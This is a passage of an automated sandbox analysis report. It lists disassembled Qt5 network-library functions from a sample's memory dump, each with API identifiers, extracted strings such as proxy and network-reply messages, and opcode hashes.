                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Generic$Argument@@Return$Object@@$Variant@@$Meta$ConnectionType@$Array@@ByteConnection@Data@@$?invokeArgument@@333333333@ListMethod@Qt@@Qt@@@Url@@V0@@$?connect@Logger@@Message$?begin@?compare@?debug@?dispose@?end@?free_helper@?from?setCaseData@1@@DateEncoded@HashInt@Mode@1@@Mutex@@Node@1@@Parent@ParsingSensitivity@Time@@V0@$$V1@@
                                                                                                                                                              • String ID: 1_q_cacheLoadReadyRead()$2readChannelFinished()$2readyRead()$QNetworkReplyImpl: setCachingEnabled(true) called after setCachingEnabled(false)$QUrl$_q_cacheLoadReadyRead$_q_metaDataChanged$int$location$onRedirected
                                                                                                                                                              • API String ID: 1924231958-794269202
                                                                                                                                                              • Opcode ID: 431b464ba633db0f57d07d505bb71e5538782703efa7932535a88366e123e37e
                                                                                                                                                              • Instruction ID: 8983d8544729abecea1892f8f476a0715563ae710a0c57c0d988a049ca4d4b00
                                                                                                                                                              • Opcode Fuzzy Hash: 431b464ba633db0f57d07d505bb71e5538782703efa7932535a88366e123e37e
                                                                                                                                                              • Instruction Fuzzy Hash: 54627166A09EC5D5E7628F38D8542ED73A1FF88759F849132DE4D07A25EF38D24ACB00
                                                                                                                                                              Function 00007FFBA198C530 Relevance: 123.1, APIs: 68, Strings: 2, Instructions: 645timeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Generic$Argument@@Return$Variant@@$Bool@ByteV0@@$Array@@Device@@Object@@Url@@$?append@?invoke?open@?read?sharedAll@Argument@@333333333@ArrayArray@@@Buffer@@ConnectionData@@DateDevice@@@@@Flag@Flags@MetaMethod@ModeNull@OpenQt@@RingTime@@Type@V0@$$Valid@
                                                                                                                                                              • String ID: _q_bufferOutgoingData$_q_startOperation
                                                                                                                                                              • API String ID: 2520889489-4139675878
                                                                                                                                                              • Opcode ID: 8ad9f2b170f32126a30a09fff465ea484b0c46023f0984d5e5ad48b2de51eec9
                                                                                                                                                              • Instruction ID: 5ff2d96daa939573dd6c0fa4f9ef7106f07bb0422250ac82a6c676b7c3ad2031
                                                                                                                                                              • Opcode Fuzzy Hash: 8ad9f2b170f32126a30a09fff465ea484b0c46023f0984d5e5ad48b2de51eec9
                                                                                                                                                              • Instruction Fuzzy Hash: E0821C22909EC499E7328F38D8557ED7361FF9871CF859222DA4D1AA25FF34A2D5CB00
                                                                                                                                                              Function 00007FFBA1A023B0 Relevance: 121.2, APIs: 62, Strings: 7, Instructions: 487libraryloadertimeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$Data@@$List$?from?utf16@Array@Char$?dispose@?load@AddressData@1@@E__@@FreeGlobalLibrary@@ProcSystem$?begin@Char@@Empty@V0@@$?indexArray@@ByteCaseChar@@@DateLatin1Qt@@@Sensitivity@Time@@V0@$$$?append@?clear@?data@?detach_grow@?end@?mid@ArrayData@1@MultipleObjectsWait
                                                                                                                                                              • String ID: Qt System Proxy access/1.0$WinHttpCloseHandle$WinHttpGetDefaultProxyConfiguration$WinHttpGetIEProxyConfigForCurrentUser$WinHttpGetProxyForUrl$WinHttpOpen$winhttp
                                                                                                                                                              • API String ID: 511862194-1767786424
                                                                                                                                                              • Opcode ID: ebdbb8919e9fc1ac213378fd7ae04e6907451f6531d9ac406b5a1f6b830e0f0e
                                                                                                                                                              • Instruction ID: bab94c007de61a6edf9be2fae7f4a67595d67f66014fba077fcf00773630e780
                                                                                                                                                              • Opcode Fuzzy Hash: ebdbb8919e9fc1ac213378fd7ae04e6907451f6531d9ac406b5a1f6b830e0f0e
                                                                                                                                                              • Instruction Fuzzy Hash: 01327CB1A1AB4296EB928B31E8541B977A5FF80794F444037DE6F476A4EF3CE449CB00
                                                                                                                                                              Function 00007FFBA19FCA80 Relevance: 100.3, APIs: 56, Strings: 1, Instructions: 504timeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$?begin@$String@@$?dispose@AdaptersAddressesData@1@@memmove$?append@?detach_grow@?end@BasicData@1@Timer@@freemalloc
                                                                                                                                                              • String ID: Got unknown socket family %d
                                                                                                                                                              • API String ID: 3210312320-2487179491
                                                                                                                                                              • Opcode ID: 0f96530f8caab14e688ee5168579e881a6f31b8b6bc55deb87fbe11b8ceba3ae
                                                                                                                                                              • Instruction ID: 3bba174b68ef47ca8f950361b5ba3db9638c407bb95ad7ac639d99d69c7b0d95
                                                                                                                                                              • Opcode Fuzzy Hash: 0f96530f8caab14e688ee5168579e881a6f31b8b6bc55deb87fbe11b8ceba3ae
                                                                                                                                                              • Instruction Fuzzy Hash: F1328272B0AA4292EB91CF75E4402B973A1FB84BA8F444136DE5E47694EF3CD54ACF40
                                                                                                                                                              Function 00007FFBA1989DA0 Relevance: 77.3, APIs: 32, Strings: 12, Instructions: 275windowtimeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$Variant@@$Object@@$Connection@Logger@@MessageMeta$Debug@@$?connect@?translate@Application@@ConnectionCoreLatin1Qt@@@Type@$?warning@ByteChar@@@ElapsedString@@@Timer@@V0@@$??6@?arg@?debug@?invalidate@?scheme@?start@ArrayArray@@Bool@Char@@DataLongLong@Null@Ptr@@@Url@@Url@@@V0@$$
                                                                                                                                                              • String ID: 1_q_networkSessionFailed()$1_q_networkSessionStateChanged(QNetworkSession::State)$1_q_networkSessionUsagePoliciesChanged(QNetworkSession::UsagePolicies)$2error(QNetworkSession::SessionError)$2stateChanged(QNetworkSession::State)$2usagePoliciesChanged(QNetworkSession::UsagePolicies)$Backend is waiting for QNetworkSession to connect, but there is none!$Background request not allowed.$Network session error.$Protocol "%1" is unknown$QNetworkReply$QNetworkReplyImpl::_q_startOperation was called more than once
                                                                                                                                                              • API String ID: 54228858-3248017120
                                                                                                                                                              • Opcode ID: f0d9990323e39086b0c764559e7480ddb4eca554b636e79a749ce1e57ce4d255
                                                                                                                                                              • Instruction ID: e4a672852523fec6aabbad5a2ae8de6aff7227480162f48b651303425ad85076
                                                                                                                                                              • Opcode Fuzzy Hash: f0d9990323e39086b0c764559e7480ddb4eca554b636e79a749ce1e57ce4d255
                                                                                                                                                              • Instruction Fuzzy Hash: 10D165B1A0A64286EB92DF75E8506ED7361FB84798F444032DE5E47668EF3CE54ACF00
                                                                                                                                                              Function 00007FFBA19D0CF0 Relevance: 73.9, APIs: 32, Strings: 10, Instructions: 368COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Generic$Argument@@Return$Object@@$Meta$Variant@@$ConnectionConnection@Type@$?connect@?invokeArgument@@333333333@Method@Qt@@Qt@@@String@@$?translate@Application@@Bool@CoreV0@@
                                                                                                                                                              • String ID: 1_q_networkSessionStateChanged(QNetworkSession::State)$1_q_networkSessionUsagePoliciesChanged(QNetworkSession::UsagePolicies)$2stateChanged(QNetworkSession::State)$2usagePoliciesChanged(QNetworkSession::UsagePolicies)$Background request not allowed.$QNetworkReply$QNetworkReply::NetworkError$QString$_q_error$_q_finished
                                                                                                                                                              • API String ID: 793192670-364496617
                                                                                                                                                              • Opcode ID: 826e871643abf02c0fcbbbded3b009ccc70e44ef30d889f7db7d99842b1b6121
                                                                                                                                                              • Instruction ID: 77b6d59d731730f15422f9fa918eb7ad1894c58413fa74bf6992b31b003477fb
                                                                                                                                                              • Opcode Fuzzy Hash: 826e871643abf02c0fcbbbded3b009ccc70e44ef30d889f7db7d99842b1b6121
                                                                                                                                                              • Instruction Fuzzy Hash: E3129462A09AC595F7629F38D8453ED73A0FF8875CF845132DE8D06A65EF39D24ACB00
                                                                                                                                                              Function 00007FFBA19D93B0 Relevance: 72.0, APIs: 32, Strings: 9, Instructions: 267windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Generic$Argument@@Return$Object@@$String@@$MetaVariant@@$ConnectionType@$?invokeArgument@@333333333@ByteConnection@Latin1Logger@@MessageMethod@Qt@@String@@@$?connect@?translate@?warning@Application@@ArrayArray@@CoreDataPtr@@@Qt@@@V0@@
                                                                                                                                                              • String ID: 1_q_networkSessionFailed()$2error(QNetworkSession::SessionError)$Backend is waiting for QNetworkSession to connect, but there is none!$Network session error.$QNetworkReply$QNetworkReply::NetworkError$QString$_q_error$_q_finished
                                                                                                                                                              • API String ID: 2838713502-3126378000
                                                                                                                                                              • Opcode ID: 78c0f055df2067a1ea6c638ae087f82dd1f2b18c3405e702b48012d8c29b3fc8
                                                                                                                                                              • Instruction ID: 8efd0a209acdb01b9604822e1b643b16c18f12ec712aca7dcec6324dd15fb2c5
                                                                                                                                                              • Opcode Fuzzy Hash: 78c0f055df2067a1ea6c638ae087f82dd1f2b18c3405e702b48012d8c29b3fc8
                                                                                                                                                              • Instruction Fuzzy Hash: 00E19562A09ED5D5F7129F38D8452E973B1FF98318F845222DE8D06624EF38D24ACB00
                                                                                                                                                              Function 00007FFBA1976E60 Relevance: 59.8, APIs: 24, Strings: 10, Instructions: 321COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00007FFBA197AD60: ?checkQObjectShared@ExternalRefCountData@QtSharedPointer@@QEAAXPEBVQObject@@@Z.QT5CORE(?,?,?,00007FFBA1974D60,?,?,?,?,?,00007FFBA1974CC0), ref: 00007FFBA197ADBE
                                                                                                                                                              • ?disconnect@QObject@@SA_NPEBV1@PEBD01@Z.QT5CORE ref: 00007FFBA1976F8D
                                                                                                                                                              • ?disconnect@QObject@@SA_NPEBV1@PEBD01@Z.QT5CORE ref: 00007FFBA1976FA3
                                                                                                                                                              • ?disconnect@QObject@@SA_NPEBV1@PEBD01@Z.QT5CORE ref: 00007FFBA1976FBD
                                                                                                                                                              • ?disconnect@QObject@@SA_NPEBV1@PEBD01@Z.QT5CORE ref: 00007FFBA1976FD7
                                                                                                                                                              • ?activate@QMetaObject@@SAXPEAVQObject@@PEBU1@HPEAPEAX@Z.QT5CORE ref: 00007FFBA19770EE
                                                                                                                                                              • ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE ref: 00007FFBA197711B
                                                                                                                                                              • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE ref: 00007FFBA1977125
                                                                                                                                                              • ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE ref: 00007FFBA1977150
                                                                                                                                                              • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE ref: 00007FFBA197715A
                                                                                                                                                              • ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE ref: 00007FFBA1977185
                                                                                                                                                              • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE ref: 00007FFBA197718F
                                                                                                                                                              • ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE ref: 00007FFBA19771BA
                                                                                                                                                              • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE ref: 00007FFBA19771C4
                                                                                                                                                              • ??0QGenericReturnArgument@@QEAA@PEBDPEAX@Z.QT5CORE ref: 00007FFBA197723D
                                                                                                                                                              • ??0QGenericReturnArgument@@QEAA@PEBDPEAX@Z.QT5CORE ref: 00007FFBA1977253
                                                                                                                                                              • ??0QGenericReturnArgument@@QEAA@PEBDPEAX@Z.QT5CORE ref: 00007FFBA1977269
                                                                                                                                                              • ??0QGenericReturnArgument@@QEAA@PEBDPEAX@Z.QT5CORE ref: 00007FFBA197727F
                                                                                                                                                              • ??0QGenericReturnArgument@@QEAA@PEBDPEAX@Z.QT5CORE ref: 00007FFBA1977295
                                                                                                                                                              • ??0QGenericReturnArgument@@QEAA@PEBDPEAX@Z.QT5CORE ref: 00007FFBA19772AB
                                                                                                                                                              • ??0QGenericReturnArgument@@QEAA@PEBDPEAX@Z.QT5CORE ref: 00007FFBA19772C1
                                                                                                                                                              • ??0QGenericReturnArgument@@QEAA@PEBDPEAX@Z.QT5CORE ref: 00007FFBA19772D7
                                                                                                                                                              • ??0QGenericReturnArgument@@QEAA@PEBDPEAX@Z.QT5CORE ref: 00007FFBA19772EC
                                                                                                                                                              • ??0QGenericReturnArgument@@QEAA@PEBDPEAX@Z.QT5CORE ref: 00007FFBA1977305
                                                                                                                                                              • ?invokeMethod@QMetaObject@@SA_NPEAVQObject@@PEBDW4ConnectionType@Qt@@VQGenericArgument@@333333333@Z.QT5CORE ref: 00007FFBA19773AA
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Object@@$Generic$Argument@@MetaReturn$Connection@$ConnectionType@$?connect@?disconnect@D01@Qt@@@$?activate@?check?invokeArgument@@333333333@CountData@ExternalMethod@ObjectObject@@@Pointer@@Qt@@SharedShared@
                                                                                                                                                              • String ID: 1_q_networkSessionClosed()$1_q_networkSessionFailed(QNetworkSession::SessionError)$1_q_networkSessionStateChanged(QNetworkSession::State)$2closed()$2error(QNetworkSession::SessionError)$2networkSessionConnected()$2opened()$2stateChanged(QNetworkSession::State)$QNetworkSession::State$_q_networkSessionStateChanged
                                                                                                                                                              • API String ID: 233722527-1168794301
                                                                                                                                                              • Opcode ID: 3819875a614421d163c1be6ddb3223e21b0d7a5d196e810ae8f3abadaef90f83
                                                                                                                                                              • Instruction ID: 44040583d379ce1c5be371d185cdb1323eb0de3347645b5fec7f03f4323a24cd
                                                                                                                                                              • Opcode Fuzzy Hash: 3819875a614421d163c1be6ddb3223e21b0d7a5d196e810ae8f3abadaef90f83
                                                                                                                                                              • Instruction Fuzzy Hash: BBF18072A09B8595E7528F38D8442ED73A5FF487A8F844232DE9D47A64EF3CD646CB00
                                                                                                                                                              Function 00007FFBA197FD00 Relevance: 56.3, APIs: 29, Strings: 3, Instructions: 329COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00007FFBA197E320: ??0QMessageLogger@@QEAA@PEBDH0@Z.QT5CORE ref: 00007FFBA198C30C
                                                                                                                                                                • Part of subcall function 00007FFBA197E320: ?className@QMetaObject@@QEBAPEBDXZ.QT5CORE ref: 00007FFBA198C324
                                                                                                                                                                • Part of subcall function 00007FFBA197E320: ?debug@QMessageLogger@@QEBAXPEBDZZ.QT5CORE ref: 00007FFBA198C337
                                                                                                                                                              • ??1QUrl@@QEAA@XZ.QT5CORE ref: 00007FFBA197FD66
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Logger@@Message$?class?debug@MetaName@Object@@Url@@
                                                                                                                                                              • String ID: cache-control$must-revalidate$no-cache
                                                                                                                                                              • API String ID: 622338911-1948583773
                                                                                                                                                              • Opcode ID: f191b4192abe41d2277358f986821253ab3f497908db971a7653beaf77fb99ee
                                                                                                                                                              • Instruction ID: fed00db48880bfc9313f4635c63b1d71753155be00a8e0de09f806e2f726896c
                                                                                                                                                              • Opcode Fuzzy Hash: f191b4192abe41d2277358f986821253ab3f497908db971a7653beaf77fb99ee
                                                                                                                                                              • Instruction Fuzzy Hash: 22E190B6B0AA4685EB92DF35D4502BC63A1FF44B98F844432CE1E17665EF3CE54ACB10
                                                                                                                                                              Function 00007FFBA19D2690 Relevance: 56.3, APIs: 30, Strings: 2, Instructions: 282windowtimeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              • QNetworkReplyImplPrivate::error: Internal problem, this method must only be called once., xrefs: 00007FFBA19D28A7
                                                                                                                                                              • Temporary network failure., xrefs: 00007FFBA19D286E
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Variant@@$V0@@$Null@$?cmp@Device@@Logger@@LongLong@MessageString@@V1@@$?read?set?stop@?tr@?warning@ChannelErrorFinished@MetaObject@@String@String@@@Timer@@V0@$$
                                                                                                                                                              • String ID: QNetworkReplyImplPrivate::error: Internal problem, this method must only be called once.$Temporary network failure.
                                                                                                                                                              • API String ID: 2143859080-3817206060
                                                                                                                                                              • Opcode ID: 67cb8ae6947acbf7a0c418a38d8c55584ecf239151dfe05defe2e29a9cbfa77d
                                                                                                                                                              • Instruction ID: 70b8c1ac53440881ef432cb2218f4dc8f5a64ac22be8f14087f1af56e914af84
                                                                                                                                                              • Opcode Fuzzy Hash: 67cb8ae6947acbf7a0c418a38d8c55584ecf239151dfe05defe2e29a9cbfa77d
                                                                                                                                                              • Instruction Fuzzy Hash: C9D171B2B0AA4296EBE6DB35D5543BC2364FB50B98F444032CE2D176A5DF3CE44ACB40
                                                                                                                                                              Function 00007FFBA198AE60 Relevance: 54.6, APIs: 29, Strings: 2, Instructions: 321windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              • QNetworkReplyImplPrivate::error: Internal problem, this method must only be called once., xrefs: 00007FFBA198B0E6
                                                                                                                                                              • Temporary network failure., xrefs: 00007FFBA198B0AD
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Variant@@$V0@@$Null@$?cmp@Device@@Logger@@LongLong@MessageString@@V1@@$?read?set?tr@?warning@ChannelErrorFinished@MetaObject@@String@String@@@V0@$$
                                                                                                                                                              • String ID: QNetworkReplyImplPrivate::error: Internal problem, this method must only be called once.$Temporary network failure.
                                                                                                                                                              • API String ID: 220436485-3817206060
                                                                                                                                                              • Opcode ID: 07e3cde1b9c0b0e31a97493fbec195c80ddd30faded0b66e8f4e272d743d639c
                                                                                                                                                              • Instruction ID: 57f623f8bd780d44c2519e3a476741c15f2c287a8237b97583d15d22d2a68fc2
                                                                                                                                                              • Opcode Fuzzy Hash: 07e3cde1b9c0b0e31a97493fbec195c80ddd30faded0b66e8f4e272d743d639c
                                                                                                                                                              • Instruction Fuzzy Hash: 6FE16FB2B0AA4296EB96DB35D5543FC23A0FB50B98F484032DE1E47695DF3CE456CB40
                                                                                                                                                              Function 00007FFBA1989410 Relevance: 51.0, APIs: 23, Strings: 6, Instructions: 254COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?_Xlength_error@std@@YAXPEBD@Z.MSVCP140(?,?,?,?,00007FFBA19E652E,?,00000000,00000000,00007FFBA19E6A82,?,?,?,?,00007FFBA19E68A4), ref: 00007FFBA198941B
                                                                                                                                                              • ?sharedNull@QArrayData@@SAPEAU1@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FFBA1989480
